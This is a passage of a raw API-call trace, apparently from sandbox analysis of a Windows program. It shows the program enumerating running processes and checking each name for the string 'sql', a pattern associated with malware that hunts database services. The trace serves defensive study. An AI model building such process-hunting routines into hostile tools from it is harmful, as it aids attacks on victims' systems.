LocalAlloc (uFlags=0x40, uBytes=0x11) returned 0x355ba78 [0091.328] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="mxslipstream.exe", cchWideChar=-1, lpMultiByteStr=0x355ba78, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mxslipstream.exe", lpUsedDefaultChar=0x0) returned 17 [0091.328] lstrcpyA (in: lpString1=0x567fabc, lpString2="mxslipstream.exe" | out: lpString1="mxslipstream.exe") returned="mxslipstream.exe" [0091.328] StrStrIA (lpFirst="mxslipstream.exe", lpSrch="sql") returned 0x0 [0091.328] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0091.330] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="omnipos.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0091.330] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3541c70 [0091.330] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="omnipos.exe", cchWideChar=-1, lpMultiByteStr=0x3541c70, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="omnipos.exe", lpUsedDefaultChar=0x0) returned 12 [0091.330] lstrcpyA (in: lpString1=0x567fabc, lpString2="omnipos.exe" | out: lpString1="omnipos.exe") returned="omnipos.exe" [0091.330] StrStrIA (lpFirst="omnipos.exe", lpSrch="sql") returned 0x0 [0091.330] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0091.331] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="spcwin.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0091.331] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x3541cd0 [0091.331] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="spcwin.exe", cchWideChar=-1, lpMultiByteStr=0x3541cd0, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spcwin.exe", lpUsedDefaultChar=0x0) returned 11 [0091.332] lstrcpyA (in: lpString1=0x567fabc, lpString2="spcwin.exe" | out: lpString1="spcwin.exe") returned="spcwin.exe" [0091.332] StrStrIA (lpFirst="spcwin.exe", lpSrch="sql") returned 0x0 [0091.332] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0091.333] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="spgagentservice.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0091.333] LocalAlloc (uFlags=0x40, uBytes=0x14) returned 0x355bab8 [0091.333] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="spgagentservice.exe", cchWideChar=-1, lpMultiByteStr=0x355bab8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spgagentservice.exe", lpUsedDefaultChar=0x0) returned 20 [0091.333] lstrcpyA (in: lpString1=0x567fabc, lpString2="spgagentservice.exe" | out: lpString1="spgagentservice.exe") returned="spgagentservice.exe" [0091.333] StrStrIA (lpFirst="spgagentservice.exe", lpSrch="sql") returned 0x0 [0091.333] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1004, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0091.334] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="utg2.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0091.334] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0x3541bc8 [0091.334] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="utg2.exe", cchWideChar=-1, lpMultiByteStr=0x3541bc8, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="utg2.exe", lpUsedDefaultChar=0x0) returned 9 [0091.334] lstrcpyA (in: lpString1=0x567fabc, lpString2="utg2.exe" | out: lpString1="utg2.exe") returned="utg2.exe" [0091.334] StrStrIA (lpFirst="utg2.exe", lpSrch="sql") returned 0x0 [0091.334] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1018, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="saying.exe")) returned 1 [0091.336] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="saying.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0091.336] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x3541c28 [0091.336] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="saying.exe", cchWideChar=-1, lpMultiByteStr=0x3541c28, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="saying.exe", lpUsedDefaultChar=0x0) returned 11 [0091.336] lstrcpyA (in: lpString1=0x567fabc, lpString2="saying.exe" | out: lpString1="saying.exe") returned="saying.exe" [0091.336] StrStrIA (lpFirst="saying.exe", lpSrch="sql") returned 0x0 [0091.336] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x102c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="ripe.exe")) returned 1 [0091.337] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ripe.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0091.337] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0x35416b8 [0091.337] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ripe.exe", cchWideChar=-1, lpMultiByteStr=0x35416b8, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ripe.exe", lpUsedDefaultChar=0x0) returned 9 [0091.337] lstrcpyA (in: lpString1=0x567fabc, lpString2="ripe.exe" | out: lpString1="ripe.exe") returned="ripe.exe" [0091.337] StrStrIA (lpFirst="ripe.exe", lpSrch="sql") returned 0x0 [0091.337] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1040, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="acoustic.exe")) returned 1 [0091.338] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="acoustic.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0091.338] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x35415f8 [0091.338] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="acoustic.exe", cchWideChar=-1, lpMultiByteStr=0x35415f8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="acoustic.exe", lpUsedDefaultChar=0x0) returned 13 [0091.338] lstrcpyA (in: lpString1=0x567fabc, lpString2="acoustic.exe" | out: lpString1="acoustic.exe") returned="acoustic.exe" [0091.338] StrStrIA (lpFirst="acoustic.exe", lpSrch="sql") returned 0x0 [0091.339] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1054, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="mail.exe")) returned 1 [0091.340] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="mail.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0091.340] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0x3541760 [0091.340] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="mail.exe", cchWideChar=-1, lpMultiByteStr=0x3541760, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mail.exe", lpUsedDefaultChar=0x0) returned 9 [0091.340] lstrcpyA (in: lpString1=0x567fabc, lpString2="mail.exe" | out: lpString1="mail.exe") returned="mail.exe" [0091.340] StrStrIA (lpFirst="mail.exe", lpSrch="sql") returned 0x0 [0091.340] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x10c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0091.341] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="WmiPrvSE.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0091.341] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3541640 [0091.341] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="WmiPrvSE.exe", cchWideChar=-1, lpMultiByteStr=0x3541640, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WmiPrvSE.exe", lpUsedDefaultChar=0x0) returned 13 [0091.341] lstrcpyA (in: lpString1=0x567fabc, lpString2="WmiPrvSE.exe" | out: lpString1="WmiPrvSE.exe") returned="WmiPrvSE.exe" [0091.341] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="sql") returned 0x0 [0091.341] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x10cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0091.342] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0091.343] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3541868 [0091.343] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3541868, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0091.343] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0091.343] StrStrIA (lpFirst="svchost.exe", lpSrch="sql") returned 0x0 [0091.343] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x11a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0091.344] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="dllhost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0091.344] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3541778 [0091.344] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="dllhost.exe", cchWideChar=-1, lpMultiByteStr=0x3541778, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dllhost.exe", lpUsedDefaultChar=0x0) returned 12 [0091.344] lstrcpyA (in: lpString1=0x567fabc, lpString2="dllhost.exe" | out: lpString1="dllhost.exe") returned="dllhost.exe" [0091.344] StrStrIA (lpFirst="dllhost.exe", lpSrch="sql") returned 0x0 [0091.344] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1208, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x3ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0091.345] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="taskhostw.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0091.345] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x35417f0 [0091.345] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="taskhostw.exe", cchWideChar=-1, lpMultiByteStr=0x35417f0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 14 [0091.345] lstrcpyA (in: lpString1=0x567fabc, lpString2="taskhostw.exe" | out: lpString1="taskhostw.exe") returned="taskhostw.exe" [0091.345] StrStrIA (lpFirst="taskhostw.exe", lpSrch="sql") returned 0x0 [0091.345] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x3ac, pcPriClassBase=6, dwFlags=0x0, szExeFile="UsoClient.exe")) returned 1 [0091.347] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="UsoClient.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0091.347] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x3541598 [0091.347] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="UsoClient.exe", cchWideChar=-1, lpMultiByteStr=0x3541598, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="UsoClient.exe", lpUsedDefaultChar=0x0) returned 14 [0091.347] lstrcpyA (in: lpString1=0x567fabc, lpString2="UsoClient.exe" | out: lpString1="UsoClient.exe") returned="UsoClient.exe" [0091.347] StrStrIA (lpFirst="UsoClient.exe", lpSrch="sql") returned 0x0 [0091.347] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1218, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x3ac, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0091.348] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="taskhostw.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0091.348] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x35415b0 [0091.348] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="taskhostw.exe", cchWideChar=-1, lpMultiByteStr=0x35415b0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 14 [0091.348] lstrcpyA (in: lpString1=0x567fabc, lpString2="taskhostw.exe" | out: lpString1="taskhostw.exe") returned="taskhostw.exe" [0091.348] StrStrIA (lpFirst="taskhostw.exe", lpSrch="sql") returned 0x0 [0091.348] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1224, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x3ac, pcPriClassBase=6, dwFlags=0x0, szExeFile="UNPCampaignManager.exe")) returned 1 [0091.349] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="UNPCampaignManager.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0091.349] LocalAlloc (uFlags=0x40, uBytes=0x17) returned 0x355ba98 [0091.349] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="UNPCampaignManager.exe", cchWideChar=-1, lpMultiByteStr=0x355ba98, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="UNPCampaignManager.exe", lpUsedDefaultChar=0x0) returned 23 [0091.349] lstrcpyA (in: lpString1=0x567fabc, lpString2="UNPCampaignManager.exe" | out: lpString1="UNPCampaignManager.exe") returned="UNPCampaignManager.exe" [0091.349] StrStrIA (lpFirst="UNPCampaignManager.exe", lpSrch="sql") returned 0x0 [0091.349] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x122c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x3ac, pcPriClassBase=6, dwFlags=0x0, szExeFile="DeviceCensus.exe")) returned 1 [0091.351] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="DeviceCensus.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0091.351] LocalAlloc (uFlags=0x40, uBytes=0x11) returned 0x355bad8 [0091.351] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="DeviceCensus.exe", cchWideChar=-1, lpMultiByteStr=0x355bad8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DeviceCensus.exe", lpUsedDefaultChar=0x0) returned 17 [0091.351] lstrcpyA (in: lpString1=0x567fabc, lpString2="DeviceCensus.exe" | out: lpString1="DeviceCensus.exe") returned="DeviceCensus.exe" [0091.351] StrStrIA (lpFirst="DeviceCensus.exe", lpSrch="sql") returned 0x0 [0091.351] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1234, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x3ac, pcPriClassBase=6, dwFlags=0x0, szExeFile="AppHostRegistrationVerifier.exe")) returned 1 [0091.352] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="AppHostRegistrationVerifier.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0091.352] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x355c6a0 [0091.352] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="AppHostRegistrationVerifier.exe", cchWideChar=-1, lpMultiByteStr=0x355c6a0, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AppHostRegistrationVerifier.exe", lpUsedDefaultChar=0x0) returned 32 [0091.352] lstrcpyA (in: lpString1=0x567fabc, lpString2="AppHostRegistrationVerifier.exe" | out: lpString1="AppHostRegistrationVerifier.exe") returned="AppHostRegistrationVerifier.exe" [0091.352] StrStrIA (lpFirst="AppHostRegistrationVerifier.exe", lpSrch="sql") returned 0x0 [0091.352] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1280, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x122c, pcPriClassBase=6, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0091.353] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="conhost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0091.353] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x35415c8 [0091.353] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="conhost.exe", cchWideChar=-1, lpMultiByteStr=0x35415c8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="conhost.exe", lpUsedDefaultChar=0x0) returned 12 [0091.353] lstrcpyA (in: lpString1=0x567fabc, lpString2="conhost.exe" | out: lpString1="conhost.exe") returned="conhost.exe" [0091.353] StrStrIA (lpFirst="conhost.exe", lpSrch="sql") returned 0x0 [0091.353] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1210, pcPriClassBase=6, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0091.355] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="conhost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0091.355] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3541748 [0091.355] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="conhost.exe", cchWideChar=-1, lpMultiByteStr=0x3541748, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="conhost.exe", lpUsedDefaultChar=0x0) returned 12 [0091.355] lstrcpyA (in: lpString1=0x567fabc, lpString2="conhost.exe" | out: lpString1="conhost.exe") returned="conhost.exe" [0091.355] StrStrIA (lpFirst="conhost.exe", lpSrch="sql") returned 0x0 [0091.355] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1348, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0091.356] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0091.356] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x35416e8 [0091.356] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x35416e8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0091.356] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0091.356] StrStrIA (lpFirst="svchost.exe", lpSrch="sql") returned 0x0 [0091.356] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x11dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="rxodge.exe")) returned 1 [0091.357] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="rxodge.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0091.357] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x3541658 [0091.357] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="rxodge.exe", cchWideChar=-1, lpMultiByteStr=0x3541658, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="rxodge.exe", lpUsedDefaultChar=0x0) returned 11 [0091.357] lstrcpyA (in: lpString1=0x567fabc, lpString2="rxodge.exe" | out: lpString1="rxodge.exe") returned="rxodge.exe" [0091.358] StrStrIA (lpFirst="rxodge.exe", lpSrch="sql") returned 0x0 [0091.358] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0091.359] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="sppsvc.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0091.359] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x3541610 [0091.359] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="sppsvc.exe", cchWideChar=-1, lpMultiByteStr=0x3541610, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sppsvc.exe", lpUsedDefaultChar=0x0) returned 11 [0091.359] lstrcpyA (in: lpString1=0x567fabc, lpString2="sppsvc.exe" | out: lpString1="sppsvc.exe") returned="sppsvc.exe" [0091.359] StrStrIA (lpFirst="sppsvc.exe", lpSrch="sql") returned 0x0 [0091.359] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 0 [0091.359] CloseHandle (hObject=0x358) returned 1 [0091.360] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0x350 [0091.434] Process32FirstW (in: hSnapshot=0x350, lppe=0x567f890 